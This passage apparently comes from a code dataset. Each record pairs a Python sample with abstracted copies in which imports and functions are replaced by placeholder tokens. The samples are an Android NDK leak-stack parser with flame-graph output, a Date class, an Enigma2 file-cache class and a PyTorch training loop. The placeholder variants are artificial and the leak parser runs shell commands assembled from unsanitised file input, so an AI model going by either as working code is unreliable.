libAbsolutePath + "/" + libName + ".svg" commend = plExePath + " " + flStackFilePath + " > " + svgPath os.system(commend) printSVG(reportHtmlFile, svgPath.replace(os.path.split(libAbsolutePath)[0], "./")) printReportTail(reportHtmlFile) def main(args): if 4 > len(args): print("请输入\"android ndk路径\" \"stack文件路径\" \"arm架构(armeabi/armeabi-v7a/arm64-v8a)\" \"带符号表so所在目录\"") return ParseStack(args[0], args[1], args[2], args[3], args[4]) if __name__ == "__main__": main(sys.argv)
[ "#!/usr/bin/python\n# coding=UTF-8\n\nimport sys\nimport subprocess\nimport os\n\ndef printReportTail(reportHtmlFile):\n reportHtmlFile.write(\"\"\"\n</body>\n</html>\n\"\"\")\n\ndef printReportHead(reportHtmlFile):\n reportHtmlFile.write(\"\"\"<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>Document</title>\n</head>\n<body>\n\"\"\")\n\ndef printTitle(reportHtmlFile, title):\n reportHtmlFile.write(\"<h2>\" + title + \"</h2>\\n\")\n\ndef printText(reportHtmlFile, text):\n reportHtmlFile.write(\"<h4>\" + text + \"</h4>\\n\")\n\ndef printSVG(reportHtmlFile, svgPath):\n reportHtmlFile.write('<embed src=\"')\n reportHtmlFile.write(svgPath)\n reportHtmlFile.write('\" type=\"image/svg+xml\" />')\n\ndef ParseStack(currentPath, ndkPath, stackFile, architecture, symbolsDir):\n print \"currentPath: \" + currentPath\n # 查找addr2line文件\n print \"architecture is \" + architecture\n if architecture == \"arm64-v8a\":\n addr2line = ndkPath + \"/toolchains/aarch64-linux-android-4.9/prebuilt/darwin-x86_64/bin/aarch64-linux-android-addr2line\"\n elif architecture == \"armeabi\" or architecture == \"armeabi-v7a\":\n addr2line = ndkPath + \"/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-addr2line\"\n else:\n print \"do not support architecture type for \" + architecture\n print \"only support armeabi/armeabi-v7a/arm64-v8a\"\n return\n\n print \"addr2line path: \" + addr2line\n if not os.path.exists(addr2line):\n print \"can not find \" + architecture + \" addr2line\"\n else:\n print \"find \" + architecture + \" addr2line\"\n\n reportHtmlPath = os.path.split(stackFile)[0] + \"/leakReport.html\"\n if os.path.exists(reportHtmlPath):\n os.unlink(reportHtmlPath)\n reportHtmlFile = open(reportHtmlPath, \"a\")\n printReportHead(reportHtmlFile)\n\n # 处理stack文件\n for line in open(stackFile): \n\n if line.startswith(\"libName:\"):\n libName = line.replace(\"libName:\", \"\").replace('\\n', '').replace('\\r', '')\n\n printTitle(reportHtmlFile, libName)\n \n libAbsolutePath = os.path.split(stackFile)[0] + \"/\" + libName\n if not os.path.exists(libAbsolutePath):\n os.makedirs(libAbsolutePath)\n flStackFilePath = libAbsolutePath + \"/fl_stack.txt\"\n flameGraphFile = open(flStackFilePath, \"w\")\n print \"find lib: \" + libName\n elif line.startswith(\"leakSize:\"):\n leakSize = line.replace(\"leakSize:\", \"\").replace('\\n', '').replace('\\r', '')\n\n leakMsg = \"leak size: \" + leakSize + \"\\n\"\n\n printText(reportHtmlFile, leakMsg)\n\n print leakMsg\n elif line.startswith(\"stack:\"):\n stack = line.replace(\"stack:\", \"\").replace('\\n', '').replace('\\r', '')\n # print \"stack: \"\n for stackElement in stack.split(\"^\"):\n if stackElement == \"\":\n continue\n \n dlinfo = stackElement.split(\"|\")\n pc = dlinfo[0]\n libPath = dlinfo[1]\n symbol = dlinfo[2]\n # print \"pc \" + pc + \" \" + libPath + \" \" + symbol\n symbolFile = symbolsDir + \"/\" + os.path.split(libPath)[1]\n if os.path.exists(symbolFile):\n # print \"---------\"\n parseCommend = addr2line + \" -Ce \" + symbolFile + \" -f \" + pc\n # print parseCommend\n # os.system(parseCommend)\n result = os.popen(parseCommend) \n res = result.read() \n retraces = res.splitlines()\n if len(retraces) != 2 or \"?\" in retraces[0] or \"?\" in retraces[1]:\n if symbol != \"\":\n method = symbol\n codeLine = -1\n else:\n method = pc\n codeLine = -1\n else:\n method = retraces[0]\n codeLine = retraces[1]\n # print method\n # print codeLine\n elif symbol != \"\":\n method = symbol\n codeLine = -1\n else:\n method = pc\n codeLine = -1\n \n flameGraphFile.write(method + \";\")\n flameGraphFile.write(\" 1\\n\")\n elif line.replace('\\n', '').replace('\\r', '') == \"libSplit!!!\":\n # 结束了一个lib的输出\n print \"finish lib \" + libName + \" parse\"\n plExePath = os.path.split(currentPath)[0] + \"/flamegraph.pl\"\n svgPath = libAbsolutePath + \"/\" + libName + \".svg\"\n commend = plExePath + \" \" + flStackFilePath + \" > \" + svgPath\n os.system(commend)\n\n printSVG(reportHtmlFile, svgPath.replace(os.path.split(libAbsolutePath)[0], \"./\"))\n\n printReportTail(reportHtmlFile)\n\ndef main(args):\n if 4 > len(args):\n print(\"请输入\\\"android ndk路径\\\" \\\"stack文件路径\\\" \\\"arm架构(armeabi/armeabi-v7a/arm64-v8a)\\\" \\\"带符号表so所在目录\\\"\")\n return\n ParseStack(args[0], args[1], args[2], args[3], args[4])\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n" ]
true
16
805fc9a26650f85227d14da972311ffbd9dbd555
class Date: def __init__(self, strDate): strDate = strDate.split('.') self.day = strDate[0] self.month = strDate[1] self.year = strDate[2]
[ "class Date:\n def __init__(self, strDate):\n strDate = strDate.split('.')\n self.day = strDate[0]\n self.month = strDate[1]\n self.year = strDate[2]\n", "class Date:\n\n def __init__(self, strDate):\n strDate = strDate.split('.')\n self.day = strDate[0]\n self.month = strDate[1]\n self.year = strDate[2]\n", "class Date:\n <function token>\n", "<class token>\n" ]
false
17
a7218971b831e2cfda9a035eddb350ecf1cdf938
#!/usr/bin/python # encoding: utf-8 # # In case of reuse of this source code please do not remove this copyright. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # For more information on the GNU General Public License see: # <http://www.gnu.org/licenses/>. # from Components.config import config from datetime import datetime import os MinCacheLimit = config.EMC.min_file_cache_limit.getValue() pathisfile = os.path.isfile pathisdir = os.path.isdir pathislink = os.path.islink pathexists = os.path.exists pathreal = os.path.realpath idx_isLink=0 idx_isDir=1 idx_isFile=2 idx_Date=3 idx_realpath=4 idx_num=5 class EMCFileCache(): def __init__(self): self.cacheDirectoryList = {} self.cacheFileList = {} self.cacheAttributeList = {} self.cacheCountSizeList = {} def addCountSizeToCache(self, path, count, size): # print "EMC addCountSizeToCache", path if self.cacheCountSizeList.has_key(path): lastcount, lastsize = self.cacheCountSizeList[path] if lastcount != count or lastsize != size: del self.cacheCountSizeList[path] self.cacheCountSizeList[path] = count, size else: self.cacheCountSizeList[path] = count, size # print "EMC addCountSizeToCache", self.cacheCountSizeList def getCountSizeFromCache(self, path): if self.cacheCountSizeList.has_key(path): return self.cacheCountSizeList[path] else: return None # print "EMC getCountSizeFromCache", self.cacheCountSizeList def delcacheCountSizeList(self): self.cacheCountSizeList = {} print "EMC delete cacheCountSizeList", self.cacheCountSizeList def delcacheCountSizeListEntriesOnFileOp(self,path): #print "EMC delcacheCountSizeListEntriesOnFileOp",path rescanPaths = [] if path: for k in self.cacheCountSizeList.keys(): if (k+"/").startswith(path+"/") or (path+"/").startswith(k+"/"): # drop dirs containing path, but not "a/bc" when path is "a/bcd/e", therefore append "/" del self.cacheCountSizeList[k] rescanPaths.append(k) #print "EMC delcacheCountSizeListEntriesOnFileOp IS deleting",k," due to OP on path ",path #else: #print "EMC delcacheCountSizeListEntriesOnFileOp NOT deleting",k," due to OP on path ",path return rescanPaths def IsPathInCountSizeList(self, path): if self.cacheCountSizeList.has_key(path): return True else: return False def addPathToCache(self, path, subdirlist, filelist, MovieCenterInst): if config.EMC.files_cache.value: print "EMC addPathToCache", path if (len(subdirlist)>MinCacheLimit) or (len(filelist)>MinCacheLimit): self.cacheDirectoryList[path] = subdirlist for p, n, e in subdirlist: if not (p in self.cacheAttributeList): AttributeList=[None]*idx_num AttributeList[idx_isLink] = pathislink(p) AttributeList[idx_isDir] = True # we are in subdirlist AttributeList[idx_isFile] = False # we are in subdirlist AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, True) AttributeList[idx_realpath] = pathreal(p) #for dirs only self.cacheAttributeList[p] = AttributeList self.cacheFileList[path] = filelist for p, n, e in filelist: if not (p in self.cacheAttributeList): AttributeList=[None]*idx_num AttributeList[idx_isLink] = pathislink(p) AttributeList[idx_isDir] = False # we are in filelist, no entry is a real directrory ... AttributeList[idx_isFile] = pathisfile(p) # ... but filelist might contain virtual directories AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, False) #AttributeList[idx_realpath] = pathreal(p) #for dirs only self.cacheAttributeList[p] = AttributeList else: if self.cacheDirectoryList.has_key(path): self.deleteAssociatedListEntries(self.cacheDirectoryList[path]) del self.cacheDirectoryList[path] if self.cacheFileList.has_key(path): self.deleteAssociatedListEntries(self.cacheFileList[path]) del self.cacheFileList[path] # self.debugPrintDirCache() # self.debugPrintFileCache() # self.debugPrintFileAttributeCache() def addRecToCacheFileList(self, path, rec): if config.EMC.files_cache.value: if self.cacheFileList.has_key(path): filelist = self.cacheFileList[path] filelist.append(rec) del self.cacheFileList[path] self.cacheFileList[path] = filelist def getCacheForPath(self, path): print "EMC getCacheForPath", path if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path): subdirlist = self.cacheDirectoryList[path] filelist = self.cacheFileList[path] # self.debugPrintDirCache() # self.debugPrintFileCache() # self.debugPrintFileAttributeCache() return subdirlist, filelist else: return None, None def isLink(self, path): isLink = None if config.EMC.files_cache.value and (path in self.cacheAttributeList): isLink = self.cacheAttributeList[path][idx_isLink] if isLink is None: isLink = pathislink(path) return isLink def isDir(self, path): isDir = None if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList): isDir = self.cacheAttributeList[path][idx_isDir] if isDir is None: isDir = pathisdir(path) return isDir def isFile(self, path): isFile = None if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList): isFile = self.cacheAttributeList[path][idx_isFile] if isFile is None: isFile = pathisfile(path) return isFile def realpath(self, path): realpath = None if config.EMC.files_cache.value and (path in self.cacheAttributeList): realpath = self.cacheAttributeList[path][idx_realpath] if realpath is None: realpath = pathreal(path) return realpath def getDateInfoFromCacheForPath(self, path): if config.EMC.files_cache.value and (path in self.cacheAttributeList): return self.cacheAttributeList[path][idx_Date] else: return None def getDirsFromCacheForPath(self, path): if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path): subdirlist = self.cacheDirectoryList[path] return subdirlist else: return None def getFilesFromCacheForPath(self, path): if config.EMC.files_cache.value and self.cacheFileList.has_key(path): filelist = self.cacheFileList[path] return filelist else: return None def IsPathInCache(self, path): if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path): return True else: return False def IsPathWithDirsInCache(self, path): if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path): return True else: return False def IsPathWithFilesInCache(self, path): if config.EMC.files_cache.value and self.cacheFileList.has_key(path): return True else: return False def delPathFromCache(self, path): if len(path)>1 and path[-1]=="/": path = path[:-1] print "EMC delPathFromCache", path if self.cacheDirectoryList.has_key(path): self.deleteAssociatedListEntries(self.cacheDirectoryList[path]) del self.cacheDirectoryList[path] if self.cacheFileList.has_key(path): self.deleteAssociatedListEntries(self.cacheFileList[path]) del self.cacheFileList[path] # self.debugPrintDirCache() # self.debugPrintFileCache() # self.debugPrintFileAttributeCache() def delPathFromDirCache(self, path): if len(path)>1 and path[-1]=="/": path = path[:-1] if self.cacheDirectoryList.has_key(path): self.deleteAssociatedListEntries(self.cacheDirectoryList[path]) del self.cacheDirectoryList[path] def delPathFromFileCache(self, path): if len(path)>1 and path[-1]=="/": path = path[:-1] if self.cacheFileList.has_key(path): self.deleteAssociatedListEntries(self.cacheFileList[path]) del self.cacheFileList[path] def debugPrintFileCache(self): print "cacheFileList:" for p in self.cacheFileList: print p,self.cacheFileList[p] print "" def debugPrintDirCache(self): print "cacheDirectoryList:" for p in self.cacheDirectoryList: print p,self.cacheDirectoryList[p] print "" def debugPrintFileAttributeCache(self): print "cacheAttributeList:" for p in self.cacheAttributeList: print p,self.cacheAttributeList[p] print "" def deleteAssociatedListEntries(self, list): for p, n, e in list: if p in self.cacheAttributeList and (config.EMC.check_dead_links.value != "only_initially"): del self.cacheAttributeList[p] movieFileCache = EMCFileCache()
[ "#!/usr/bin/python\n# encoding: utf-8\n#\n# In case of reuse of this source code please do not remove this copyright.\n#\n#\tThis program is free software: you can redistribute it and/or modify\n#\tit under the terms of the GNU General Public License as published by\n#\tthe Free Software Foundation, either version 3 of the License, or\n#\t(at your option) any later version.\n#\n#\tThis program is distributed in the hope that it will be useful,\n#\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n#\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#\tGNU General Public License for more details.\n#\n#\tFor more information on the GNU General Public License see:\n#\t<http://www.gnu.org/licenses/>.\n#\n\nfrom Components.config import config\nfrom datetime import datetime\nimport os\n\nMinCacheLimit = config.EMC.min_file_cache_limit.getValue()\npathisfile = os.path.isfile\npathisdir = os.path.isdir\npathislink = os.path.islink\npathexists = os.path.exists\npathreal = os.path.realpath\n\nidx_isLink=0\nidx_isDir=1\nidx_isFile=2\nidx_Date=3\nidx_realpath=4\nidx_num=5\n\nclass EMCFileCache():\n\tdef __init__(self):\n\t\tself.cacheDirectoryList = {}\n\t\tself.cacheFileList = {}\n\t\tself.cacheAttributeList = {}\n\t\tself.cacheCountSizeList = {}\n\n\tdef addCountSizeToCache(self, path, count, size):\n#\t\tprint \"EMC addCountSizeToCache\", path\n\t\tif self.cacheCountSizeList.has_key(path):\n\t\t\tlastcount, lastsize = self.cacheCountSizeList[path]\n\t\t\tif lastcount != count or lastsize != size:\n\t\t\t\tdel self.cacheCountSizeList[path]\n\t\t\t\tself.cacheCountSizeList[path] = count, size\n\t\telse:\n\t\t\tself.cacheCountSizeList[path] = count, size\n#\t\tprint \"EMC addCountSizeToCache\", self.cacheCountSizeList\n\n\tdef getCountSizeFromCache(self, path):\n\t\tif self.cacheCountSizeList.has_key(path):\n\t\t\treturn self.cacheCountSizeList[path]\n\t\telse:\n\t\t\treturn None\n#\t\tprint \"EMC getCountSizeFromCache\", self.cacheCountSizeList\n\n\tdef delcacheCountSizeList(self):\n\t\tself.cacheCountSizeList = {}\n\t\tprint \"EMC delete cacheCountSizeList\", self.cacheCountSizeList\n\n\tdef delcacheCountSizeListEntriesOnFileOp(self,path):\n\t\t#print \"EMC delcacheCountSizeListEntriesOnFileOp\",path\n\t\trescanPaths = []\n\t\tif path:\n\t\t\tfor k in self.cacheCountSizeList.keys():\n\t\t\t\tif (k+\"/\").startswith(path+\"/\") or (path+\"/\").startswith(k+\"/\"): # drop dirs containing path, but not \"a/bc\" when path is \"a/bcd/e\", therefore append \"/\"\n\t\t\t\t\tdel self.cacheCountSizeList[k]\n\t\t\t\t\trescanPaths.append(k)\n\t\t\t\t\t#print \"EMC delcacheCountSizeListEntriesOnFileOp IS deleting\",k,\" due to OP on path \",path\n\t\t\t\t#else:\n\t\t\t\t\t#print \"EMC delcacheCountSizeListEntriesOnFileOp NOT deleting\",k,\" due to OP on path \",path\n\t\treturn rescanPaths\n\n\tdef IsPathInCountSizeList(self, path):\n\t\tif self.cacheCountSizeList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef addPathToCache(self, path, subdirlist, filelist, MovieCenterInst):\n\t\tif config.EMC.files_cache.value:\n\t\t\tprint \"EMC addPathToCache\", path\n\t\t\tif (len(subdirlist)>MinCacheLimit) or (len(filelist)>MinCacheLimit):\n\t\t\t\tself.cacheDirectoryList[path] = subdirlist\n\t\t\t\tfor p, n, e in subdirlist:\n\t\t\t\t\tif not (p in self.cacheAttributeList):\n\t\t\t\t\t\tAttributeList=[None]*idx_num\n\t\t\t\t\t\tAttributeList[idx_isLink] = pathislink(p)\n\t\t\t\t\t\tAttributeList[idx_isDir] = True # we are in subdirlist\n\t\t\t\t\t\tAttributeList[idx_isFile] = False # we are in subdirlist\n\t\t\t\t\t\tAttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, True)\n\t\t\t\t\t\tAttributeList[idx_realpath] = pathreal(p) #for dirs only\n\t\t\t\t\t\tself.cacheAttributeList[p] = AttributeList\n\t\t\t\tself.cacheFileList[path] = filelist\n\t\t\t\tfor p, n, e in filelist:\n\t\t\t\t\tif not (p in self.cacheAttributeList):\n\t\t\t\t\t\tAttributeList=[None]*idx_num\n\t\t\t\t\t\tAttributeList[idx_isLink] = pathislink(p)\n\t\t\t\t\t\tAttributeList[idx_isDir] = False # we are in filelist, no entry is a real directrory ...\n\t\t\t\t\t\tAttributeList[idx_isFile] = pathisfile(p) # ... but filelist might contain virtual directories\n\t\t\t\t\t\tAttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, False)\n\t\t\t\t\t\t#AttributeList[idx_realpath] = pathreal(p) #for dirs only\n\t\t\t\t\t\tself.cacheAttributeList[p] = AttributeList\n\t\t\telse:\n\t\t\t\tif self.cacheDirectoryList.has_key(path):\n\t\t\t\t\tself.deleteAssociatedListEntries(self.cacheDirectoryList[path])\n\t\t\t\t\tdel self.cacheDirectoryList[path]\n\t\t\t\tif self.cacheFileList.has_key(path):\n\t\t\t\t\tself.deleteAssociatedListEntries(self.cacheFileList[path])\n\t\t\t\t\tdel self.cacheFileList[path]\n#\t\tself.debugPrintDirCache()\n#\t\tself.debugPrintFileCache()\n#\t\tself.debugPrintFileAttributeCache()\n\n\tdef addRecToCacheFileList(self, path, rec):\n\t\tif config.EMC.files_cache.value:\n\t\t\tif self.cacheFileList.has_key(path):\n\t\t\t\tfilelist = self.cacheFileList[path]\n\t\t\t\tfilelist.append(rec)\n\t\t\t\tdel self.cacheFileList[path]\n\t\t\t\tself.cacheFileList[path] = filelist\n\n\tdef getCacheForPath(self, path):\n\t\tprint \"EMC getCacheForPath\", path\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):\n\t\t\tsubdirlist = self.cacheDirectoryList[path]\n\t\t\tfilelist = self.cacheFileList[path]\n#\t\t\tself.debugPrintDirCache()\n#\t\t\tself.debugPrintFileCache()\n#\t\t\tself.debugPrintFileAttributeCache()\n\t\t\treturn subdirlist, filelist\n\t\telse:\n\t\t\treturn None, None\n\n\tdef isLink(self, path):\n\t\tisLink = None\n\t\tif config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\tisLink = self.cacheAttributeList[path][idx_isLink]\n\t\tif isLink is None:\n\t\t\tisLink = pathislink(path)\n\t\treturn isLink\n\n\tdef isDir(self, path):\n\t\tisDir = None\n\t\tif (config.EMC.check_dead_links.value != \"always\") and config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\tisDir = self.cacheAttributeList[path][idx_isDir]\n\t\tif isDir is None:\n\t\t\tisDir = pathisdir(path)\n\t\treturn isDir\n\n\tdef isFile(self, path):\n\t\tisFile = None\n\t\tif (config.EMC.check_dead_links.value != \"always\") and config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\tisFile = self.cacheAttributeList[path][idx_isFile]\n\t\tif isFile is None:\n\t\t\tisFile = pathisfile(path)\n\t\treturn isFile\n\n\tdef realpath(self, path):\n\t\trealpath = None\n\t\tif config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\trealpath = self.cacheAttributeList[path][idx_realpath]\n\t\tif realpath is None:\n\t\t\trealpath = pathreal(path)\n\t\treturn realpath\n\n\tdef getDateInfoFromCacheForPath(self, path):\n\t\tif config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\treturn self.cacheAttributeList[path][idx_Date]\n\t\telse:\n\t\t\treturn None\n\n\tdef getDirsFromCacheForPath(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):\n\t\t\tsubdirlist = self.cacheDirectoryList[path]\n\t\t\treturn subdirlist\n\t\telse:\n\t\t\treturn None\n\n\tdef getFilesFromCacheForPath(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheFileList.has_key(path):\n\t\t\tfilelist = self.cacheFileList[path]\n\t\t\treturn filelist\n\t\telse:\n\t\t\treturn None\n\n\tdef IsPathInCache(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef IsPathWithDirsInCache(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef IsPathWithFilesInCache(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheFileList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef delPathFromCache(self, path):\n\t\tif len(path)>1 and path[-1]==\"/\":\n\t\t\tpath = path[:-1]\n\t\tprint \"EMC delPathFromCache\", path\n\t\tif self.cacheDirectoryList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheDirectoryList[path])\n\t\t\tdel self.cacheDirectoryList[path]\n\t\tif self.cacheFileList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheFileList[path])\n\t\t\tdel self.cacheFileList[path]\n#\t\tself.debugPrintDirCache()\n#\t\tself.debugPrintFileCache()\n#\t\tself.debugPrintFileAttributeCache()\n\n\tdef delPathFromDirCache(self, path):\n\t\tif len(path)>1 and path[-1]==\"/\":\n\t\t\tpath = path[:-1]\n\t\tif self.cacheDirectoryList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheDirectoryList[path])\n\t\t\tdel self.cacheDirectoryList[path]\n\n\tdef delPathFromFileCache(self, path):\n\t\tif len(path)>1 and path[-1]==\"/\":\n\t\t\tpath = path[:-1]\n\t\tif self.cacheFileList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheFileList[path])\n\t\t\tdel self.cacheFileList[path]\n\n\tdef debugPrintFileCache(self):\n\t\tprint \"cacheFileList:\"\n\t\tfor p in self.cacheFileList:\n\t\t\tprint p,self.cacheFileList[p]\n\t\tprint \"\"\n\n\tdef debugPrintDirCache(self):\n\t\tprint \"cacheDirectoryList:\"\n\t\tfor p in self.cacheDirectoryList:\n\t\t\tprint p,self.cacheDirectoryList[p]\n\t\tprint \"\"\n\n\tdef debugPrintFileAttributeCache(self):\n\t\tprint \"cacheAttributeList:\"\n\t\tfor p in self.cacheAttributeList:\n\t\t\tprint p,self.cacheAttributeList[p]\n\t\tprint \"\"\n\n\tdef deleteAssociatedListEntries(self, list):\n\t\tfor p, n, e in list:\n\t\t\tif p in self.cacheAttributeList and (config.EMC.check_dead_links.value != \"only_initially\"):\n\t\t\t\tdel self.cacheAttributeList[p]\n\nmovieFileCache = EMCFileCache()\n" ]
true
18
038ccba05113fb7f2f589eaa7345df53cb59a5af
#!/usr/bin/env python # -*- coding: utf-8 -*- import sys import torch from torch import nn, autograd import config import time import copy import progressbar as pb from dataset import TrainDataSet from model import BiAffineSrlModel from fscore import FScore config.add_option('-m', '--mode', dest='mode', default='train', type='string', help='[train|eval|pred]', action='store') config.add_option('--seed', dest='seed', default=1, type='int', help='torch random seed', action='store') def train(num_epochs = 30): lossfunction = nn.CrossEntropyLoss() trainset = TrainDataSet() model = BiAffineSrlModel(vocabs=trainset.vocabs) optimizer = torch.optim.Adam(model.parameters(), lr=0.01) since = time.time() best_model_wts = copy.deepcopy(model.state_dict()) best_f = FScore() for epoch in range(num_epochs): print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr) print('-' * 10, file=sys.stderr) for phase in ['train', 'dev']: model.train(phase == 'train') running_loss = 0.0 running_f = FScore() for sentence in pb.progressbar(trainset.get_set(phase)): model.zero_grad() role_p = model(*sentence['inputs']) _, predict = torch.max(role_p, 1) loss = lossfunction(role_p, autograd.Variable(sentence['targets'][0])) if phase == 'train': loss.backward() optimizer.step() if epoch > 28: print(predict.data) print(sentence['targets'][0]) running_loss += loss.data[0] running_f.update(predict, sentence['targets'][0]) print('\n{} Loss: {:.4f} {}'.format(phase, running_loss, running_f), file=sys.stderr) if phase == 'dev' and running_f > best_f: best_f = running_f best_model_wts = copy.deepcopy(model.state_dict()) print('', file=sys.stderr) time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format( time_elapsed // 60, time_elapsed % 60), file=sys.stderr) print('Best val F: {}s'.format(best_f), file=sys.stderr) model.load_state_dict(best_model_wts) return model if __name__ == '__main__': config.parse_args() torch.manual_seed(config.get_option('seed')) mode = config.get_option('mode') if mode == 'train': train() else: NotImplementedError()
[ "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport torch\nfrom torch import nn, autograd\nimport config\nimport time\nimport copy\nimport progressbar as pb\nfrom dataset import TrainDataSet\nfrom model import BiAffineSrlModel\nfrom fscore import FScore\n\nconfig.add_option('-m', '--mode', dest='mode', default='train', type='string', help='[train|eval|pred]', action='store')\nconfig.add_option('--seed', dest='seed', default=1, type='int', help='torch random seed', action='store')\n\ndef train(num_epochs = 30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, autograd.Variable(sentence['targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss, running_f), file=sys.stderr)\n\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n\n model.load_state_dict(best_model_wts)\n return model\n\n\nif __name__ == '__main__':\n config.parse_args()\n torch.manual_seed(config.get_option('seed'))\n mode = config.get_option('mode')\n if mode == 'train':\n train()\n else:\n NotImplementedError()\n", "import sys\nimport torch\nfrom torch import nn, autograd\nimport config\nimport time\nimport copy\nimport progressbar as pb\nfrom dataset import TrainDataSet\nfrom model import BiAffineSrlModel\nfrom fscore import FScore\nconfig.add_option('-m', '--mode', dest='mode', default='train', type=\n 'string', help='[train|eval|pred]', action='store')\nconfig.add_option('--seed', dest='seed', default=1, type='int', help=\n 'torch random seed', action='store')\n\n\ndef train(num_epochs=30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, autograd.Variable(sentence[\n 'targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss,\n running_f), file=sys.stderr)\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,\n time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n model.load_state_dict(best_model_wts)\n return model\n\n\nif __name__ == '__main__':\n config.parse_args()\n torch.manual_seed(config.get_option('seed'))\n mode = config.get_option('mode')\n if mode == 'train':\n train()\n else:\n NotImplementedError()\n", "<import token>\nconfig.add_option('-m', '--mode', dest='mode', default='train', type=\n 'string', help='[train|eval|pred]', action='store')\nconfig.add_option('--seed', dest='seed', default=1, type='int', help=\n 'torch random seed', action='store')\n\n\ndef train(num_epochs=30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = 